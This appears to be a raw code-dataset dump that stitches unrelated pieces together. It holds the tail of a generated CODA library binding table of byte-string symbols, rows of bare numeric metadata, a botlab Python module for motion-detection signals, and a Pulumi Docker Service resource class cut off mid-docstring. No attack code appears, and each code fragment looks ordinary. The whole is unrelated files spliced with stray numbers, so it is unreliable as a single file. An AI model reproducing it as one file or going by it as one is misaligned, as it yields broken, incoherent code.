\x00\x01\x40\x23coda_cursor_read_uint32_array',0,b'\x00\x01\x21\x23coda_cursor_read_uint32_partial_array',0,b'\x00\x01\x45\x23coda_cursor_read_uint64',0,b'\x00\x01\x49\x23coda_cursor_read_uint64_array',0,b'\x00\x01\x27\x23coda_cursor_read_uint64_partial_array',0,b'\x00\x01\x4E\x23coda_cursor_read_uint8',0,b'\x00\x01\x52\x23coda_cursor_read_uint8_array',0,b'\x00\x01\x2D\x23coda_cursor_read_uint8_partial_array',0,b'\x00\x00\x62\x23coda_cursor_set_product',0,b'\x00\x00\x5B\x23coda_cursor_use_base_type_of_special_type',0,b'\x00\x02\x08\x23coda_datetime_to_double',0,b'\x00\x02\x2B\x23coda_done',0,b'\x00\x01\xF0\x23coda_double_to_datetime',0,b'\x00\x01\xF0\x23coda_double_to_utcdatetime',0,b'\x00\x00\x0F\x23coda_errno_to_string',0,b'\xFF\xFF\xFF\x0Bcoda_expression_boolean',0,b'\x00\x02\x19\x23coda_expression_delete',0,b'\x00\x01\x6F\x23coda_expression_eval_bool',0,b'\x00\x01\x6A\x23coda_expression_eval_float',0,b'\x00\x01\x74\x23coda_expression_eval_integer',0,b'\x00\x01\x60\x23coda_expression_eval_node',0,b'\x00\x01\x64\x23coda_expression_eval_string',0,b'\xFF\xFF\xFF\x0Bcoda_expression_float',2,b'\x00\x00\x3A\x23coda_expression_from_string',0,b'\x00\x01\x7D\x23coda_expression_get_type',0,b'\x00\x00\x00\x23coda_expression_get_type_name',0,b'\xFF\xFF\xFF\x0Bcoda_expression_integer',1,b'\x00\x01\x5D\x23coda_expression_is_constant',0,b'\x00\x01\x79\x23coda_expression_is_equal',0,b'\xFF\xFF\xFF\x0Bcoda_expression_node',4,b'\x00\x01\x81\x23coda_expression_print',0,b'\xFF\xFF\xFF\x0Bcoda_expression_string',3,b'\xFF\xFF\xFF\x0Bcoda_expression_void',5,b'\xFF\xFF\xFF\x0Bcoda_ffs_could_not_access_directory',2,b'\xFF\xFF\xFF\x0Bcoda_ffs_could_not_open_file',1,b'\xFF\xFF\xFF\x0Bcoda_ffs_error',0,b'\xFF\xFF\xFF\x0Bcoda_ffs_match',4,b'\xFF\xFF\xFF\x0Bcoda_ffs_no_match',5,b'\xFF\xFF\xFF\x0Bcoda_ffs_unsupported_file',3,b'\xFF\xFF\xFF\x0Bcoda_format_ascii',0,b'\xFF\xFF\xFF\x0Bcoda_format_binary',1,b'\xFF\xFF\xFF\x0Bcoda_format_cdf',5,b'\xFF\xFF\xFF\x0Bcoda_format_grib',7,b'\xFF\xFF\xFF\x0Bcoda_format_hdf4',3,b'\xFF\xFF\xFF\x0Bcoda_format_hdf5',4,b'\xFF\xFF\xFF\x0Bcoda_format_netcdf',6,b'\xFF\xFF\xFF\x0Bcoda_format_rinex',8,b'\xFF\xFF\xFF\x0Bcoda_format_sp3',9,b'\xFF\xFF\xFF\x0Bcoda_format_xml',2,b'\x00\x02\x28\x23coda_free',0,b'\x00\x00\x16\x23coda_get_errno',0,b'\x00\x00\x12\x23coda_get_libcoda_version',0,b'\x00\x02\x12\x23coda_get_option_bypass_special_types',0,b'\x00\x02\x12\x23coda_get_option_perform_boundary_checks',0,b'\x00\x02\x12\x23coda_get_option_perform_conversions',0,b'\x00\x02\x12\x23coda_get_option_use_fast_size_expressions',0,b'\x00\x02\x12\x23coda_get_option_use_mmap',0,b'\x00\x01\x8E\x23coda_get_product_class',0,b'\x00\x01\x8E\x23coda_get_product_definition_file',0,b'\x00\x01\x9E\x23coda_get_product_file_size',0,b'\x00\x01\x8E\x23coda_get_product_filename',0,b'\x00\x01\x96\x23coda_get_product_format',0,b'\x00\x01\x92\x23coda_get_product_root_type',0,b'\x00\x01\x8E\x23coda_get_product_type',0,b'\x00\x01\x88\x23coda_get_product_variable_value',0,b'\x00\x01\x9A\x23coda_get_product_version',0,b'\x00\x02\x12\x23coda_init',0,b'\xFF\xFF\xFF\x0Bcoda_integer_class',2,b'\x00\x01\xE4\x23coda_isInf',0,b'\x00\x01\xE4\x23coda_isMinInf',0,b'\x00\x01\xE4\x23coda_isNaN',0,b'\x00\x01\xE4\x23coda_isPlusInf',0,b'\x00\x00\x4C\x23coda_match_filefilter',0,b'\xFF\xFF\xFF\x0Bcoda_native_type_bytes',12,b'\xFF\xFF\xFF\x0Bcoda_native_type_char',10,b'\xFF\xFF\xFF\x0Bcoda_native_type_double',9,b'\xFF\xFF\xFF\x0Bcoda_native_type_float',8,b'\xFF\xFF\xFF\x0Bcoda_native_type_int16',2,b'\xFF\xFF\xFF\x0Bcoda_native_type_int32',4,b'\xFF\xFF\xFF\x0Bcoda_native_type_int64',6,b'\xFF\xFF\xFF\x0Bcoda_native_type_int8',0,b'\xFF\xFF\xFF\x0Bcoda_native_type_not_available',-1,b'\xFF\xFF\xFF\x0Bcoda_native_type_string',11,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint16',3,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint32',5,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint64',7,b'\xFF\xFF\xFF\x0Bcoda_native_type_uint8',1,b'\x00\x00\x3E\x23coda_open',0,b'\x00\x00\x23\x23coda_open_as',0,b'\xFF\xFF\xFF\x0Bcoda_raw_class',5,b'\xFF\xFF\xFF\x0Bcoda_real_class',3,b'\x00\x00\x53\x23coda_recognize_file',0,b'\xFF\xFF\xFF\x0Bcoda_record_class',0,b'\x00\x00\x18\x23coda_set_definition_path',0,b'\x00\x00\x1E\x23coda_set_definition_path_conditional',0,b'\x00\x01\xFA\x23coda_set_option_bypass_special_types',0,b'\x00\x01\xFA\x23coda_set_option_perform_boundary_checks',0,b'\x00\x01\xFA\x23coda_set_option_perform_conversions',0,b'\x00\x01\xFA\x23coda_set_option_use_fast_size_expressions',0,b'\x00\x01\xFA\x23coda_set_option_use_mmap',0,b'\xFF\xFF\xFF\x0Bcoda_special_class',6,b'\xFF\xFF\xFF\x0Bcoda_special_complex',3,b'\xFF\xFF\xFF\x0Bcoda_special_no_data',0,b'\xFF\xFF\xFF\x0Bcoda_special_time',2,b'\xFF\xFF\xFF\x0Bcoda_special_vsf_integer',1,b'\x00\x02\x20\x23coda_str64',0,b'\x00\x02\x24\x23coda_str64u',0,b'\x00\x02\x1C\x23coda_strfl',0,b'\x00\x00\x42\x23coda_string_to_time',0,b'\xFF\xFF\xFF\x0Bcoda_text_class',4,b'\x00\x01\xF0\x23coda_time_double_to_parts',0,b'\x00\x01\xF0\x23coda_time_double_to_parts_utc',0,b'\x00\x01\xEB\x23coda_time_double_to_string',0,b'\x00\x01\xEB\x23coda_time_double_to_string_utc',0,b'\x00\x02\x08\x23coda_time_parts_to_double',0,b'\x00\x02\x08\x23coda_time_parts_to_double_utc',0,b'\x00\x01\xFD\x23coda_time_parts_to_string',0,b'\x00\x00\x2A\x23coda_time_string_to_double',0,b'\x00\x00\x2A\x23coda_time_string_to_double_utc',0,b'\x00\x00\x2F\x23coda_time_string_to_parts',0,b'\x00\x01\xE7\x23coda_time_to_string',0,b'\x00\x01\xE7\x23coda_time_to_utcstring',0,b'\x00\x01\xB0\x23coda_type_get_array_base_type',0,b'\x00\x01\xC8\x23coda_type_get_array_dim',0,b'\x00\x01\xC4\x23coda_type_get_array_num_dims',0,b'\x00\x01\xB0\x23coda_type_get_attributes',0,b'\x00\x01\xCD\x23coda_type_get_bit_size',0,b'\x00\x01\xC0\x23coda_type_get_class',0,b'\x00\x00\x0C\x23coda_type_get_class_name',0,b'\x00\x01\xA2\x23coda_type_get_description',0,b'\x00\x01\xA6\x23coda_type_get_fixed_value',0,b'\x00\x01\xB4\x23coda_type_get_format',0,b'\x00\x00\x03\x23coda_type_get_format_name',0,b'\x00\x01\xA2\x23coda_type_get_name',0,b'\x00\x00\x06\x23coda_type_get_native_type_name',0,b'\x00\x01\xD1\x23coda_type_get_num_record_fields',0,b'\x00\x01\xB8\x23coda_type_get_read_type',0,b'\x00\x01\xDF\x23coda_type_get_record_field_available_status',0,b'\x00\x01\xDF\x23coda_type_get_record_field_hidden_status',0,b'\x00\x01\xAB\x23coda_type_get_record_field_index_from_name',0,b'\x00\x01\xAB\x23coda_type_get_record_field_index_from_real_name',0,b'\x00\x01\xD5\x23coda_type_get_record_field_name',0,b'\x00\x01\xD5\x23coda_type_get_record_field_real_name',0,b'\x00\x01\xDA\x23coda_type_get_record_field_type',0,b'\x00\x01\xC4\x23coda_type_get_record_union_status',0,b'\x00\x01\xB0\x23coda_type_get_special_base_type',0,b'\x00\x01\xBC\x23coda_type_get_special_type',0,b'\x00\x00\x09\x23coda_type_get_special_type_name',0,b'\x00\x01\xD1\x23coda_type_get_string_length',0,b'\x00\x01\xA2\x23coda_type_get_unit',0,b'\x00\x01\xC4\x23coda_type_has_attributes',0,b'\x00\x02\x08\x23coda_utcdatetime_to_double',0,b'\x00\x00\x42\x23coda_utcstring_to_time',0),
_struct_unions = ((b'\x00\x00\x02\x37\x00\x00\x00\x02$1',b'\x00\x00\x4A\x11type',b'\x00\x00\x6D\x11index',b'\x00\x01\x5A\x11bit_offset'),(b'\x00\x00\x02\x2E\x00\x00\x00\x02$coda_cursor',b'\x00\x00\x64\x11product',b'\x00\x00\x10\x11n',b'\x00\x02\x38\x11stack'),(b'\x00\x00\x02\x30\x00\x00\x00\x10$coda_product',),(b'\x00\x00\x02\x32\x00\x00\x00\x10$coda_type',),(b'\x00\x00\x02\x2F\x00\x00\x00\x10coda_expression_struct',)),
_enums = (b'\x00\x00\x00\x76\x00\x00\x00\x16coda_array_ordering_enum\x00coda_array_ordering_c,coda_array_ordering_fortran',b'\x00\x00\x00\x01\x00\x00\x00\x16coda_expression_type_enum\x00coda_expression_boolean,coda_expression_integer,coda_expression_float,coda_expression_string,coda_expression_node,coda_expression_void',b'\x00\x00\x00\x48\x00\x00\x00\x16coda_filefilter_status_enum\x00coda_ffs_error,coda_ffs_could_not_open_file,coda_ffs_could_not_access_directory,coda_ffs_unsupported_file,coda_ffs_match,coda_ffs_no_match',b'\x00\x00\x00\x04\x00\x00\x00\x16coda_format_enum\x00coda_format_ascii,coda_format_binary,coda_format_xml,coda_format_hdf4,coda_format_hdf5,coda_format_cdf,coda_format_netcdf,coda_format_grib,coda_format_rinex,coda_format_sp3',b'\x00\x00\x00\x07\x00\x00\x00\x15coda_native_type_enum\x00coda_native_type_not_available,coda_native_type_int8,coda_native_type_uint8,coda_native_type_int16,coda_native_type_uint16,coda_native_type_int32,coda_native_type_uint32,coda_native_type_int64,coda_native_type_uint64,coda_native_type_float,coda_native_type_double,coda_native_type_char,coda_native_type_string,coda_native_type_bytes',b'\x00\x00\x00\x0A\x00\x00\x00\x16coda_special_type_enum\x00coda_special_no_data,coda_special_vsf_integer,coda_special_time,coda_special_complex',b'\x00\x00\x00\x0D\x00\x00\x00\x16coda_type_class_enum\x00coda_record_class,coda_array_class,coda_integer_class,coda_real_class,coda_text_class,coda_raw_class,coda_special_class'),
_typenames = (b'\x00\x00\x00\x76coda_array_ordering',b'\x00\x00\x02\x2Ecoda_cursor',b'\x00\x00\x02\x2Fcoda_expression',b'\x00\x00\x00\x01coda_expression_type',b'\x00\x00\x00\x48coda_filefilter_status',b'\x00\x00\x00\x04coda_format',b'\x00\x00\x00\x07coda_native_type',b'\x00\x00\x02\x30coda_product',b'\x00\x00\x00\x0Acoda_special_type',b'\x00\x00\x02\x32coda_type',b'\x00\x00\x00\x0Dcoda_type_class'),
)
| 1,969.916667
| 12,019
| 0.799103
| 5,134
| 23,639
| 3.472926
| 0.075185
| 0.261806
| 0.097925
| 0.080763
| 0.703085
| 0.657263
| 0.572406
| 0.495681
| 0.42479
| 0.390297
| 0
| 0.267775
| 0.0022
| 23,639
| 11
| 12,020
| 2,149
| 0.48815
| 0.000804
| 0
| 0
| 1
| 0.777778
| 0.919976
| 0.918156
| 0
| 1
| 0.000254
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0.111111
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
8634f7c39c35400e3d876b8b72684e5f3d408f25
| 1,813
|
py
|
Python
|
com.ppc.Bot/signals/motion.py
|
peoplepower/botlab
|
21cc90c558a17b7ef4a42bca247b437d2f968dc0
|
[
"Apache-2.0"
] | 16
|
2017-03-31T04:41:51.000Z
|
2020-07-15T07:03:06.000Z
|
com.ppc.Bot/signals/motion.py
|
peoplepower/botlab
|
21cc90c558a17b7ef4a42bca247b437d2f968dc0
|
[
"Apache-2.0"
] | 4
|
2018-07-03T05:39:36.000Z
|
2018-07-06T02:59:32.000Z
|
com.ppc.Bot/signals/motion.py
|
peoplepower/botlab
|
21cc90c558a17b7ef4a42bca247b437d2f968dc0
|
[
"Apache-2.0"
] | 8
|
2017-04-01T21:07:59.000Z
|
2019-09-18T15:23:37.000Z
|
"""
Created on May 19, 2021
This file is subject to the terms and conditions defined in the
file 'LICENSE.txt', which is part of this source code package.
@author: David Moss
"""
def did_start_detecting_motion(botengine, location_object, device_object):
"""
Device did start detecting motion
:param botengine: BotEngine environment
:param location_object: Location object
:param device_object: Device object that started detecting motion
"""
# Note this cannot be distributed externally because we're passing the device_object directly as an argument.
location_object.distribute_datastream_message(botengine, "did_start_detecting_motion", device_object, internal=True, external=False)
def did_stop_detecting_motion(botengine, location_object, device_object):
"""
Device did stop detecting motion
:param botengine: BotEngine environment
:param location_object: Location object
:param device_object: Device object that stopped detecting motion
"""
# Note this cannot be distributed externally because we're passing the device_object directly as an argument.
location_object.distribute_datastream_message(botengine, "did_stop_detecting_motion", device_object, internal=True, external=False)
def did_continue_detecting_motion(botengine, location_object, device_object):
"""
Device did continuously detecting motion
:param botengine: BotEngine environment
:param location_object: Location object
:param device_object: Device object that stopped detecting motion
"""
# Note this cannot be distributed externally because we're passing the device_object directly as an argument.
location_object.distribute_datastream_message(botengine, "did_continue_detecting_motion", device_object, internal=True, external=False)
| 41.204545
| 139
| 0.785438
| 229
| 1,813
| 6.021834
| 0.279476
| 0.130529
| 0.078318
| 0.050036
| 0.854242
| 0.854242
| 0.854242
| 0.854242
| 0.816534
| 0.68818
| 0
| 0.003919
| 0.155543
| 1,813
| 43
| 140
| 42.162791
| 0.896799
| 0.576944
| 0
| 0
| 0
| 0
| 0.118343
| 0.118343
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
863bd6abc35869b6e4b3ffe069b2b2b69b206f1b
| 27,820
|
py
|
Python
|
sdk/python/pulumi_docker/service.py
|
koper89/pulumi-docker
|
e9c24218e1ac9de68e1156ee6d7484a51cfd501e
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_docker/service.py
|
koper89/pulumi-docker
|
e9c24218e1ac9de68e1156ee6d7484a51cfd501e
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_docker/service.py
|
koper89/pulumi-docker
|
e9c24218e1ac9de68e1156ee6d7484a51cfd501e
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from . import utilities, tables
class Service(pulumi.CustomResource):
auth: pulumi.Output[dict]
"""
See Auth below for details.
* `password` (`str`) - The password to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_PASS` is also be checked.
* `server_address` (`str`) - The address of the registry server
* `username` (`str`) - The username to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_USER` is also be checked.
"""
converge_config: pulumi.Output[dict]
"""
See Converge Config below for details.
* `delay` (`str`)
* `timeout` (`str`)
"""
endpoint_spec: pulumi.Output[dict]
"""
See EndpointSpec below for details.
* `mode` (`str`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `ports` (`list`) - See Ports below for details.
* `name` (`str`) - A random name for the port.
* `protocol` (`str`) - Protocol that can be used over this port: `tcp|udp|sctp`. Default: `tcp`.
* `publishMode` (`str`) - Represents the mode in which the port is to be published: `ingress|host`
* `publishedPort` (`float`) - The port on the swarm hosts. If not set the value of `target_port` will be used.
* `targetPort` (`float`) - Port inside the container.
"""
labels: pulumi.Output[dict]
mode: pulumi.Output[dict]
"""
The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `global` (`bool`)
* `replicated` (`dict`)
* `replicas` (`float`)
"""
name: pulumi.Output[str]
"""
A random name for the port.
"""
rollback_config: pulumi.Output[dict]
"""
See RollbackConfig below for details.
* `delay` (`str`)
* `failureAction` (`str`)
* `maxFailureRatio` (`str`)
* `monitor` (`str`)
* `order` (`str`)
* `parallelism` (`float`)
"""
task_spec: pulumi.Output[dict]
"""
See TaskSpec below for details.
* `containerSpec` (`dict`)
* `args` (`list`)
* `commands` (`list`)
* `configs` (`list`)
* `configId` (`str`) - ConfigID represents the ID of the specific config.
* `configName` (`str`) - The name of the config that this references, but internally it is just provided for lookup/display purposes
* `fileName` (`str`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `dir` (`str`)
* `dnsConfig` (`dict`)
* `nameservers` (`list`)
* `options` (`list`) - The options for the logging driver, e.g.
* `searches` (`list`)
* `env` (`dict`)
* `groups` (`list`)
* `healthcheck` (`dict`)
* `interval` (`str`)
* `retries` (`float`)
* `startPeriod` (`str`)
* `tests` (`list`)
* `timeout` (`str`)
* `hostname` (`str`)
* `hosts` (`list`)
* `host` (`str`)
* `ip` (`str`)
* `image` (`str`)
* `isolation` (`str`)
* `labels` (`dict`)
* `mounts` (`list`)
* `bindOptions` (`dict`)
* `propagation` (`str`)
* `read_only` (`bool`)
* `source` (`str`)
* `target` (`str`)
* `tmpfsOptions` (`dict`)
* `mode` (`float`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `sizeBytes` (`float`)
* `type` (`str`)
* `volumeOptions` (`dict`)
* `driverName` (`str`)
* `driverOptions` (`dict`)
* `labels` (`dict`)
* `noCopy` (`bool`)
* `privileges` (`dict`)
* `credentialSpec` (`dict`)
* `file` (`str`)
* `registry` (`str`)
* `seLinuxContext` (`dict`)
* `disable` (`bool`)
* `level` (`str`)
* `role` (`str`)
* `type` (`str`)
* `user` (`str`)
* `read_only` (`bool`)
* `secrets` (`list`)
* `fileName` (`str`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `secretId` (`str`)
* `secretName` (`str`)
* `stopGracePeriod` (`str`)
* `stopSignal` (`str`)
* `user` (`str`)
* `forceUpdate` (`float`)
* `log_driver` (`dict`)
* `name` (`str`) - A random name for the port.
* `options` (`dict`) - The options for the logging driver, e.g.
* `networks` (`list`)
* `placement` (`dict`)
* `constraints` (`list`)
* `platforms` (`list`)
* `architecture` (`str`)
* `os` (`str`)
* `prefs` (`list`)
* `resources` (`dict`)
* `limits` (`dict`)
* `genericResources` (`dict`)
* `discreteResourcesSpecs` (`list`)
* `namedResourcesSpecs` (`list`)
* `memoryBytes` (`float`)
* `nanoCpus` (`float`)
* `reservation` (`dict`)
* `genericResources` (`dict`)
* `discreteResourcesSpecs` (`list`)
* `namedResourcesSpecs` (`list`)
* `memoryBytes` (`float`)
* `nanoCpus` (`float`)
* `restartPolicy` (`dict`)
* `condition` (`str`)
* `delay` (`str`)
* `maxAttempts` (`float`)
* `window` (`str`)
* `runtime` (`str`)
"""
update_config: pulumi.Output[dict]
"""
See UpdateConfig below for details.
* `delay` (`str`)
* `failureAction` (`str`)
* `maxFailureRatio` (`str`)
* `monitor` (`str`)
* `order` (`str`)
* `parallelism` (`float`)
"""
def __init__(__self__, resource_name, opts=None, auth=None, converge_config=None, endpoint_spec=None, labels=None, mode=None, name=None, rollback_config=None, task_spec=None, update_config=None, __props__=None, __name__=None, __opts__=None):
"""
Create a Service resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] auth: See Auth below for details.
:param pulumi.Input[dict] converge_config: See Converge Config below for details.
:param pulumi.Input[dict] endpoint_spec: See EndpointSpec below for details.
:param pulumi.Input[dict] mode: The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
:param pulumi.Input[str] name: A random name for the port.
:param pulumi.Input[dict] rollback_config: See RollbackConfig below for details.
:param pulumi.Input[dict] task_spec: See TaskSpec below for details.
:param pulumi.Input[dict] update_config: See UpdateConfig below for details.
The **auth** object supports the following:
* `password` (`pulumi.Input[str]`) - The password to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_PASS` is also be checked.
* `server_address` (`pulumi.Input[str]`) - The address of the registry server
* `username` (`pulumi.Input[str]`) - The username to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_USER` is also be checked.
The **converge_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `timeout` (`pulumi.Input[str]`)
The **endpoint_spec** object supports the following:
* `mode` (`pulumi.Input[str]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `ports` (`pulumi.Input[list]`) - See Ports below for details.
* `name` (`pulumi.Input[str]`) - A random name for the port.
* `protocol` (`pulumi.Input[str]`) - Protocol that can be used over this port: `tcp|udp|sctp`. Default: `tcp`.
* `publishMode` (`pulumi.Input[str]`) - Represents the mode in which the port is to be published: `ingress|host`
* `publishedPort` (`pulumi.Input[float]`) - The port on the swarm hosts. If not set the value of `target_port` will be used.
* `targetPort` (`pulumi.Input[float]`) - Port inside the container.
The **mode** object supports the following:
* `global` (`pulumi.Input[bool]`)
* `replicated` (`pulumi.Input[dict]`)
* `replicas` (`pulumi.Input[float]`)
The **rollback_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `failureAction` (`pulumi.Input[str]`)
* `maxFailureRatio` (`pulumi.Input[str]`)
* `monitor` (`pulumi.Input[str]`)
* `order` (`pulumi.Input[str]`)
* `parallelism` (`pulumi.Input[float]`)
The **task_spec** object supports the following:
* `containerSpec` (`pulumi.Input[dict]`)
* `args` (`pulumi.Input[list]`)
* `commands` (`pulumi.Input[list]`)
* `configs` (`pulumi.Input[list]`)
* `configId` (`pulumi.Input[str]`) - ConfigID represents the ID of the specific config.
* `configName` (`pulumi.Input[str]`) - The name of the config that this references, but internally it is just provided for lookup/display purposes
* `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `dir` (`pulumi.Input[str]`)
* `dnsConfig` (`pulumi.Input[dict]`)
* `nameservers` (`pulumi.Input[list]`)
* `options` (`pulumi.Input[list]`) - The options for the logging driver, e.g.
* `searches` (`pulumi.Input[list]`)
* `env` (`pulumi.Input[dict]`)
* `groups` (`pulumi.Input[list]`)
* `healthcheck` (`pulumi.Input[dict]`)
* `interval` (`pulumi.Input[str]`)
* `retries` (`pulumi.Input[float]`)
* `startPeriod` (`pulumi.Input[str]`)
* `tests` (`pulumi.Input[list]`)
* `timeout` (`pulumi.Input[str]`)
* `hostname` (`pulumi.Input[str]`)
* `hosts` (`pulumi.Input[list]`)
* `host` (`pulumi.Input[str]`)
* `ip` (`pulumi.Input[str]`)
* `image` (`pulumi.Input[str]`)
* `isolation` (`pulumi.Input[str]`)
* `labels` (`pulumi.Input[dict]`)
* `mounts` (`pulumi.Input[list]`)
* `bindOptions` (`pulumi.Input[dict]`)
* `propagation` (`pulumi.Input[str]`)
* `read_only` (`pulumi.Input[bool]`)
* `source` (`pulumi.Input[str]`)
* `target` (`pulumi.Input[str]`)
* `tmpfsOptions` (`pulumi.Input[dict]`)
* `mode` (`pulumi.Input[float]`) - The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
* `sizeBytes` (`pulumi.Input[float]`)
* `type` (`pulumi.Input[str]`)
* `volumeOptions` (`pulumi.Input[dict]`)
* `driverName` (`pulumi.Input[str]`)
* `driverOptions` (`pulumi.Input[dict]`)
* `labels` (`pulumi.Input[dict]`)
* `noCopy` (`pulumi.Input[bool]`)
* `privileges` (`pulumi.Input[dict]`)
* `credentialSpec` (`pulumi.Input[dict]`)
* `file` (`pulumi.Input[str]`)
* `registry` (`pulumi.Input[str]`)
* `seLinuxContext` (`pulumi.Input[dict]`)
* `disable` (`pulumi.Input[bool]`)
* `level` (`pulumi.Input[str]`)
* `role` (`pulumi.Input[str]`)
* `type` (`pulumi.Input[str]`)
* `user` (`pulumi.Input[str]`)
* `read_only` (`pulumi.Input[bool]`)
* `secrets` (`pulumi.Input[list]`)
* `fileName` (`pulumi.Input[str]`) - Represents the final filename in the filesystem. The specific target file that the config data is written within the docker container, e.g. `/root/config/config.json`
* `secretId` (`pulumi.Input[str]`)
* `secretName` (`pulumi.Input[str]`)
* `stopGracePeriod` (`pulumi.Input[str]`)
* `stopSignal` (`pulumi.Input[str]`)
* `user` (`pulumi.Input[str]`)
* `forceUpdate` (`pulumi.Input[float]`)
* `log_driver` (`pulumi.Input[dict]`)
* `name` (`pulumi.Input[str]`) - A random name for the port.
* `options` (`pulumi.Input[dict]`) - The options for the logging driver, e.g.
* `networks` (`pulumi.Input[list]`)
* `placement` (`pulumi.Input[dict]`)
* `constraints` (`pulumi.Input[list]`)
* `platforms` (`pulumi.Input[list]`)
* `architecture` (`pulumi.Input[str]`)
* `os` (`pulumi.Input[str]`)
* `prefs` (`pulumi.Input[list]`)
* `resources` (`pulumi.Input[dict]`)
* `limits` (`pulumi.Input[dict]`)
* `genericResources` (`pulumi.Input[dict]`)
* `discreteResourcesSpecs` (`pulumi.Input[list]`)
* `namedResourcesSpecs` (`pulumi.Input[list]`)
* `memoryBytes` (`pulumi.Input[float]`)
* `nanoCpus` (`pulumi.Input[float]`)
* `reservation` (`pulumi.Input[dict]`)
* `genericResources` (`pulumi.Input[dict]`)
* `discreteResourcesSpecs` (`pulumi.Input[list]`)
* `namedResourcesSpecs` (`pulumi.Input[list]`)
* `memoryBytes` (`pulumi.Input[float]`)
* `nanoCpus` (`pulumi.Input[float]`)
* `restartPolicy` (`pulumi.Input[dict]`)
* `condition` (`pulumi.Input[str]`)
* `delay` (`pulumi.Input[str]`)
* `maxAttempts` (`pulumi.Input[float]`)
* `window` (`pulumi.Input[str]`)
* `runtime` (`pulumi.Input[str]`)
The **update_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `failureAction` (`pulumi.Input[str]`)
* `maxFailureRatio` (`pulumi.Input[str]`)
* `monitor` (`pulumi.Input[str]`)
* `order` (`pulumi.Input[str]`)
* `parallelism` (`pulumi.Input[float]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-docker/blob/master/website/docs/r/service.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['auth'] = auth
__props__['converge_config'] = converge_config
__props__['endpoint_spec'] = endpoint_spec
__props__['labels'] = labels
__props__['mode'] = mode
__props__['name'] = name
__props__['rollback_config'] = rollback_config
if task_spec is None:
raise TypeError("Missing required property 'task_spec'")
__props__['task_spec'] = task_spec
__props__['update_config'] = update_config
super(Service, __self__).__init__(
'docker:index/service:Service',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, auth=None, converge_config=None, endpoint_spec=None, labels=None, mode=None, name=None, rollback_config=None, task_spec=None, update_config=None):
"""
Get an existing Service resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[dict] auth: See Auth below for details.
:param pulumi.Input[dict] converge_config: See Converge Config below for details.
:param pulumi.Input[dict] endpoint_spec: See EndpointSpec below for details.
:param pulumi.Input[dict] mode: The mode of resolution to use for internal load balancing between tasks. `(vip|dnsrr)`. Default: `vip`.
:param pulumi.Input[str] name: A random name for the port.
:param pulumi.Input[dict] rollback_config: See RollbackConfig below for details.
:param pulumi.Input[dict] task_spec: See TaskSpec below for details.
:param pulumi.Input[dict] update_config: See UpdateConfig below for details.
The **auth** object supports the following:
* `password` (`pulumi.Input[str]`) - The password to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_PASS` is also be checked.
* `server_address` (`pulumi.Input[str]`) - The address of the registry server
* `username` (`pulumi.Input[str]`) - The username to use for authenticating to the registry. If this is blank, the `DOCKER_REGISTRY_USER` is also be checked.
The **converge_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `timeout` (`pulumi.Input[str]`)
The **endpoint_spec** object supports the following:
